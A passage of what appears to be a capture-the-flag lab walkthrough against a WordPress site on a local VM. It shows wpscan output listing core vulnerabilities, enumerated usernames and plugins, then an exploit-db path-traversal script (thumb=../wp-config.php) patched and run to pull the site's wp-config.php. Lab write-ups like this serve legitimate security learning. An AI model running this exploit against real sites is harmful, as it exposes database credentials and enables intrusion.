Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.2.9[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
Reference: http://seclists.org/fulldisclosure/2016/Sep/6
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.2.10[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.2.10[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 4.2.11[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 4.2.11[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 4.2.11[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 4.2.11[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 4.2.11[!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
Reference: https://wpvulndb.com/vulnerabilities/8729
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
[i] Fixed in: 4.2.12[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 4.2.12[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.2.13[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.2.13[!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
Reference: https://wpvulndb.com/vulnerabilities/8768
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.2.13[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
Reference: https://wpvulndb.com/vulnerabilities/8770
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
Reference: http://seclists.org/oss-sec/2017/q1/562
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.2.13[!] Title: WordPress 2.3-4.7.4 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295[+] WordPress theme in use: bhost - v1.2.9[+] Name: bhost - v1.2.9
| Location: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/readme.txt
[!] The version is out of date, the latest version is 1.3.6
| Style URL: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/style.css
| Theme Name: BHost
| Theme URI: Author: Masum Billah
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
| Author: Masum Billah
| Author URI: http://getmasum.net/[+] Enumerating usernames ...
[+] Identified the following 10 user/s:
+----+---------+-----------------+
| Id | Login | Name |
+----+---------+-----------------+
| 1 | john | John Smith |
| 2 | elly | Elly Jones |
| 3 | peter | Peter Parker |
| 4 | barry | Barry Atkins |
| 5 | heather | Heather Neville |
| 6 | garry | garry |
| 7 | harry | harry |
| 8 | scott | scott |
| 9 | kathy | kathy |
| 10 | tim | tim |
+----+---------+-----------------+[+] Finished: Sun May 14 22:42:55 2017
[+] Requests Done: 50
[+] Memory used: 21.754 MB
[+] Elapsed time: 00:00:00
root@kali:~#
Running the switched for enumerating users and plugins together gave back a message stating that no plugins were found. So make sure you run the switches separately.
root@kali:~# wpscan --url https://192.168.1.30:12380/blogblog/ --enumerate ap
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 2.9.1
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________[+] URL: https://192.168.1.30:12380/blogblog/
[+] Started: Sun May 14 22:45:24 2017[!] The WordPress 'https://192.168.1.30:12380/blogblog/readme.html' file exists exposing a version number
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[!] Registration is enabled: https://192.168.1.30:12380/blogblog/wp-login.php?action=register
[+] XML-RPC Interface available under: https://192.168.1.30:12380/blogblog/xmlrpc.php
[!] Upload directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.1.30:12380/blogblog/wp-includes/[+] WordPress version 4.2.1 identified from advanced fingerprinting (Released on 2015-04-27)
[!] 35 vulnerabilities identified from the version number[!] Title: WordPress 4.1-4.2.1 - Genericons Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7979
Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111
Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
Reference: https://twitter.com/klikkioy/status/624264122570526720
Reference: https://klikki.fi/adv/wordpress3.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130
Reference: https://core.trac.wordpress.org/changeset/33536
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131
Reference: https://core.trac.wordpress.org/changeset/33529
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132
Reference: https://core.trac.wordpress.org/changeset/33541
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133
Reference: https://core.trac.wordpress.org/changeset/33549
Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358
Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36435
Reference: https://hackerone.com/reports/110801
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7[!] Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36444
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
Reference: https://wpvulndb.com/vulnerabilities/8473
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
Reference: https://wpvulndb.com/vulnerabilities/8474
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
[i] Fixed in: 4.5[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
Reference: https://wpvulndb.com/vulnerabilities/8475
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
[i] Fixed in: 4.5[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8488
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Reference: https://wpvulndb.com/vulnerabilities/8489
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
Reference: http://avlidienbrunn.com/wp_some_loader.php
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
[i] Fixed in: 4.2.9[!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
Reference: https://wpvulndb.com/vulnerabilities/8519
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
[i] Fixed in: 4.2.9[!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
Reference: https://wpvulndb.com/vulnerabilities/8520
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
[i] Fixed in: 4.2.9[!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
Reference: https://wpvulndb.com/vulnerabilities/8615
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
Reference: http://seclists.org/fulldisclosure/2016/Sep/6
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
[i] Fixed in: 4.2.10[!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
Reference: https://wpvulndb.com/vulnerabilities/8616
Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
[i] Fixed in: 4.2.10[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
Reference: https://wpvulndb.com/vulnerabilities/8716
Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 4.2.11[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
Reference: https://wpvulndb.com/vulnerabilities/8718
Reference: https://www.mehmetince.net/low-severity-wordpress/
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 4.2.11[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
Reference: https://wpvulndb.com/vulnerabilities/8719
Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 4.2.11[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
Reference: https://wpvulndb.com/vulnerabilities/8720
Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 4.2.11[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
Reference: https://wpvulndb.com/vulnerabilities/8721
Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 4.2.11[!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
Reference: https://wpvulndb.com/vulnerabilities/8729
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
[i] Fixed in: 4.2.12[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8730
Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 4.2.12[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
Reference: https://wpvulndb.com/vulnerabilities/8765
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
Reference: http://seclists.org/oss-sec/2017/q1/563
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 4.2.13[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
Reference: https://wpvulndb.com/vulnerabilities/8766
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 4.2.13[!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
Reference: https://wpvulndb.com/vulnerabilities/8768
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
[i] Fixed in: 4.2.13[!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
Reference: https://wpvulndb.com/vulnerabilities/8770
Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
Reference: http://seclists.org/oss-sec/2017/q1/562
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
[i] Fixed in: 4.2.13[!] Title: WordPress 2.3-4.7.4 - Host Header Injection in Password Reset
Reference: https://wpvulndb.com/vulnerabilities/8807
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295[+] WordPress theme in use: bhost - v1.2.9[+] Name: bhost - v1.2.9
| Location: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/readme.txt
[!] The version is out of date, the latest version is 1.3.6
| Style URL: https://192.168.1.30:12380/blogblog/wp-content/themes/bhost/style.css
| Theme Name: BHost
| Theme URI: Author: Masum Billah
| Description: Bhost is a nice , clean , beautifull, Responsive and modern design free WordPress Theme. This the...
| Author: Masum Billah
| Author URI: http://getmasum.net/[+] Enumerating plugins from passive detection ...
[+] No plugins found[+] Enumerating all plugins (may take a while and use a lot of system resources) ...
[+] We found 4 plugins:[+] Name: advanced-video-embed-embed-videos-or-playlists - v1.0
| Latest version: 1.0 (up to date)
| Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/readme.txt
[!] Directory listing is enabled: https://192.168.1.30:12380/blogblog/wp-content/plugins/advanced-video-embed-embed-videos-or-playlists/[+] Name: akismet
| Latest version: 3.3.2
| Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/akismet/[!] We could not determine a version so all vulnerabilities are printed out[!] Title: Akismet 2.5.0-3.1.4 - Unauthenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8215
Reference: http://blog.akismet.com/2015/10/13/akismet-3-1-5-wordpress/
Reference: https://blog.sucuri.net/2015/10/security-advisory-stored-xss-in-akismet-wordpress-plugin.html
[i] Fixed in: 3.1.5[+] Name: shortcode-ui - v0.6.2
| Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/shortcode-ui/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/plugins/shortcode-ui/readme.txt
[!] The version is out of date, the latest version is 0.7.2
[!] Directory listing is enabled: https://192.168.1.30:12380/blogblog/wp-content/plugins/shortcode-ui/[+] Name: two-factor
| Latest version: 0.1-dev-20170511
| Location: https://192.168.1.30:12380/blogblog/wp-content/plugins/two-factor/
| Readme: https://192.168.1.30:12380/blogblog/wp-content/plugins/two-factor/readme.txt
[!] Directory listing is enabled: https://192.168.1.30:12380/blogblog/wp-content/plugins/two-factor/[+] Finished: Sun May 14 22:54:19 2017
[+] Requests Done: 67551
[+] Memory used: 151.273 MB
[+] Elapsed time: 00:08:55
root@kali:~#
Four plugins were found. Lets use searchsploit to search for exploits for these plugins.
root@kali:~/B2R# cp /usr/share/exploitdb/platforms/php/webapps/39646.py .
root@kali:~/B2R# ls -la 39646.py
-rwxr-xr-x 1 root root 1772 May 14 22:58 39646.py
root@kali:~/B2R#Having a look at the exploit we understand that it prints the contents of wp-config.php in terminal (default Wordpress config). Lets modify the exploit to make it run work.
url = "https://192.168.1.30:12380/blogblog/" # insert url to wordpressRunning the exploit gives us the error
root@kali:~/B2R# python 39646.py
Traceback (most recent call last):
File "39646.py", line 41, in <module>
objHtml = urllib2.urlopen(url + '/wp-admin/admin-ajax.php?action=ave_publishPost&title=' + str(randomID) + '&short=rnd&term=rnd&thumb=../wp-config.php')
File "/usr/lib/python2.7/urllib2.py", line 154, in urlopen
return opener.open(url, data, timeout)
File "/usr/lib/python2.7/urllib2.py", line 429, in open
response = self._open(req, data)
File "/usr/lib/python2.7/urllib2.py", line 447, in _open
'_open', req)
File "/usr/lib/python2.7/urllib2.py", line 407, in _call_chain
result = func(*args)
File "/usr/lib/python2.7/urllib2.py", line 1241, in https_open
context=self._context)
File "/usr/lib/python2.7/urllib2.py", line 1198, in do_open
raise URLError(err)
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:590)>
root@kali:~/B2R#A basic google search suggests a patch for this. Add the below lines to the exploit.
import ssl
ssl._create_default_https_context = ssl._create_unverified_contextThe exploits now looks like this.
Lets run the exploit
root@kali:~/B2R# python 39646.py
root@kali:~/B2R# wget --no-check-certificate https://192.168.1.30:12380/blogblog/wp-content/uploads/1527501269.jpeg
--2017-05-14 23:18:38-- https://192.168.1.30:12380/blogblog/wp-content/uploads/1527501269.jpeg
Connecting to 192.168.1.30:12380... connected.
WARNING: The certificate of ‘192.168.1.30’ is not trusted.
WARNING: The certificate of ‘192.168.1.30’ hasn't got a known issuer.
The certificate's owner does not match hostname ‘192.168.1.30’
HTTP request sent, awaiting response... 200 OK
Length: 3042 (3.0K) [image/jpeg]
Saving to: ‘1527501269.jpeg’1527501269.jpeg 100%[============================================================================================================>] 2.97K --.-KB/s in 0s2017-05-14 23:18:38 (78.4 MB/s) - ‘1527501269.jpeg’ saved [3042/3042]
root@kali:~/B2R# ls -la 1527501269.jpeg
-rw-r--r-- 1 root root 3042 May 14 23:15 1527501269.jpeg
root@kali:~/B2R# file 1527501269.jpeg
1527501269.jpeg: PHP script, ASCII text
root@kali:~/B2R# cat 1527501269.jpeg
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
